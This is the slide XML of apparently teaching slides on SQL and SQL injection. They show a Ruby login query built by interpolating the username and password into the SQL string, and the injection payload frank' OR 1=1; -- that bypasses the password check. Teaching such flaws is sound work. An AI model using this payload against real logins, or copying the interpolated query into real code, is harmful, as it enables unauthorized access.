        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6102557" y="8017602"/>
            <a:ext cx="12178886" cy="862679"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="534" name="Group 534"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5712570" y="2747776"/>
            <a:ext cx="12958860" cy="5869037"/>
            <a:chOff x="0" y="2976"/>
            <a:chExt cx="12958859" cy="5869036"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="532" name="Shape 532"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="869315"/>
              <a:ext cx="12958860" cy="5002698"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 7563"/>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533" name="Shape 533"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5595799" y="2976"/>
              <a:ext cx="1767261"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Table</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="537" name="Group 537"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11140565" y="3613147"/>
            <a:ext cx="5793020" cy="962544"/>
            <a:chOff x="4350620" y="362101"/>
            <a:chExt cx="5793018" cy="962543"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="535" name="Shape 535"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4350620" y="742709"/>
              <a:ext cx="2008880" cy="581937"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 18767"/>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536" name="Shape 536"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6541142" y="362101"/>
              <a:ext cx="3602498"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Table name</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="540" name="Group 540"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6176847" y="4568916"/>
            <a:ext cx="2518843" cy="5009298"/>
            <a:chOff x="1474315" y="-1699796"/>
            <a:chExt cx="2518841" cy="5009296"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="538" name="Shape 538"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1546622" y="-1699797"/>
              <a:ext cx="2374229" cy="3873419"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 15658"/>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539" name="Shape 539"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1474315" y="2404624"/>
              <a:ext cx="251884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b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5"/>
                  </a:solidFill>
                  <a:latin typeface="Helvetica"/>
                  <a:ea typeface="Helvetica"/>
                  <a:cs typeface="Helvetica"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:t>Column</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="543" name="Group 543"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6536733" y="5463209"/>
            <a:ext cx="14333128" cy="1666876"/>
            <a:chOff x="-545000" y="-64544"/>
            <a:chExt cx="14333126" cy="1666875"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="541" name="Shape 541"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-545001" y="375518"/>
              <a:ext cx="11528673" cy="786750"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 35556"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="1016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542" name="Shape 542"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="11021857" y="-64545"/>
              <a:ext cx="2766269" cy="1666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defRPr b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5"/>
                  </a:solidFill>
                  <a:latin typeface="Helvetica"/>
                  <a:ea typeface="Helvetica"/>
                  <a:cs typeface="Helvetica"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>Row</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:defRPr b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5"/>
                  </a:solidFill>
                  <a:latin typeface="Helvetica"/>
                  <a:ea typeface="Helvetica"/>
                  <a:cs typeface="Helvetica"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:pPr>
              <a:r>
                <a:t>(Record)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="544" name="Shape 544"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3707672" y="9165895"/>
            <a:ext cx="13233624" cy="815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latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:t> Age FROM Users WHERE Name=‘Dee’;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="545" name="Shape 545"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="18270196" y="9121445"/>
            <a:ext cx="861889"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28</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="546" name="Shape 546"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3707672" y="10061899"/>
            <a:ext cx="13568958" cy="1489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latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UPDATE</a:t>
            </a:r>
            <a:r>
              <a:t> Users SET email=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr u="sng">
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>readgood@pp.com</a:t>
            </a:r>
            <a:r>
              <a:t>’</a:t>
            </a:r>
            <a:br/>
            <a:r>
              <a:t>   WHERE Age=32; </a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-- this is a comment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="547" name="Shape 547"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12329810" y="6775015"/>
            <a:ext cx="3438653" cy="60007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000" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr defTabSz="914400"/>
            <a:r>
              <a:rPr>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>readgood@pp.com</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="548" name="Shape 548"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3670866" y="11611106"/>
            <a:ext cx="16251635" cy="815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latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INSERT</a:t>
            </a:r>
            <a:r>
              <a:t> INTO Users Values(‘Frank’, ‘M’, 57, ...);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="549" name="Shape 549"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3670866" y="12324969"/>
            <a:ext cx="5856263" cy="815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latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DROP</a:t>
            </a:r>
            <a:r>
              <a:t> TABLE Users;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="550" name="Shape 550"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3698971" y="2546805"/>
            <a:ext cx="17478347" cy="6544617"/>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1784942023"/>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p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="10" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="18" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="26" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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5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iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="34" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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5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5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5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p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="50" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="54" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="58" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="62" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="5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iterate>
                                    <p:tmAbs val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="66" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="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animBg="1" advAuto="0"/>
      <p:bldP spid="534" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="534" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="537" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="537" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="540" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="540" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="543" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="543" grpId="1" animBg="1" advAuto="0"/>
      <p:bldP spid="544" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="545" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="546" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="547" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="548" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="549" grpId="0" animBg="1" advAuto="0"/>
      <p:bldP spid="550"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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4599397" y="552712"/>
            <a:ext cx="15609095" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Server-side code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="553" name="Shape 553"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3537737" y="6813618"/>
            <a:ext cx="17732417" cy="149848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dirty="0"/>
              <a:t>result = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>db.execute </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4400">
                <a:solidFill>
                  <a:srgbClr val="010000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>WHERE Name</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>‘#{</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}’</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>AND P</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>assword=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>#{</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>pass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>’;”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="554" name="Screen Shot 2014-02-18 at 1.58.14 AM.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4129634" y="3208580"/>
            <a:ext cx="16124732" cy="1867075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="555" name="Shape 555"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3685226" y="2410296"/>
            <a:ext cx="2578994"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b="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:t>Website</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="556" name="Shape 556"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3532923" y="5927856"/>
            <a:ext cx="6405599" cy="913711"/>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b="1">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>“Login code” </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ruby</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="557" name="Shape 557"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3536108" y="9676691"/>
            <a:ext cx="19019092" cy="913711"/>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p>
            <a:pPr algn="l">
              <a:defRPr>
                <a:solidFill>
                  <a:srgbClr val="030000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Suppose you successfully log in as </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:latin typeface="Courier" charset="0"/>
                <a:ea typeface="Courier" charset="0"/>
                <a:cs typeface="Courier" charset="0"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>if this returns any results</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="558" name="Shape 558"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7898500" y="10666077"/>
            <a:ext cx="858700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How could you exploit this?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2941765652"/>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p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4599397" y="555020"/>
            <a:ext cx="15609095" cy="1936068"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>SQL injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="562" name="Screen Shot 2014-02-18 at 1.58.14 AM.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4129634" y="3208580"/>
            <a:ext cx="16124732" cy="1867075"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="566" name="Group 566"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4353575" y="4244249"/>
            <a:ext cx="7096697" cy="1749432"/>
            <a:chOff x="-1" y="0"/>
            <a:chExt cx="7096695" cy="1749431"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="563" name="Shape 563"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="27454" y="835721"/>
              <a:ext cx="7069240" cy="913710"/>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b="1">
                  <a:solidFill>
                    <a:schemeClr val="accent5"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:ea typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                  <a:sym typeface="Courier"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:r>
                <a:rPr dirty="0"/>
                <a:t>frank’ OR 1=1; -- </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="564" name="Shape 564"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="-1" y="0"/>
              <a:ext cx="1525341" cy="805951"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="50800" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="71437" tIns="71437" rIns="71437" bIns="71437" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr sz="3200"/>
              </a:pPr>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="565" name="Shape 565"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="3524103" y="1937"/>
              <a:ext cx="3248148" cy="769986"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="50800" cap="flat">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/>
              <a:miter lim="400000"/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="71437" tIns="71437" rIns="71437" bIns="71437" numCol="1" anchor="ctr">
              <a:noAutofit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr sz="3200"/>
              </a:pPr>
              <a:endParaRPr/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="567" name="Shape 567"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1027366" y="9111058"/>
            <a:ext cx="21791221" cy="149848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 “SELECT * FROM Users</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="4400">
                <a:solidFill>
                  <a:srgbClr val="010000"/>
                </a:solidFill>
                <a:latin typeface="Courier"/>
                <a:ea typeface="Courier"/>
                <a:cs typeface="Courier"/>
                <a:sym typeface="Courier"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>       WHERE Name=</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5"/>
                </a:solidFill>
              </a:rPr>
              <a:t>frank’ OR 1=1;</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’ AND P</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>assword=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>whocares</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1333FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>’;</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86CB4B4D-7CA3-9044-876B-883B54F8677D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Shape 553"/>
          <p:cNvSpPr/>
          <p:nvPr/>
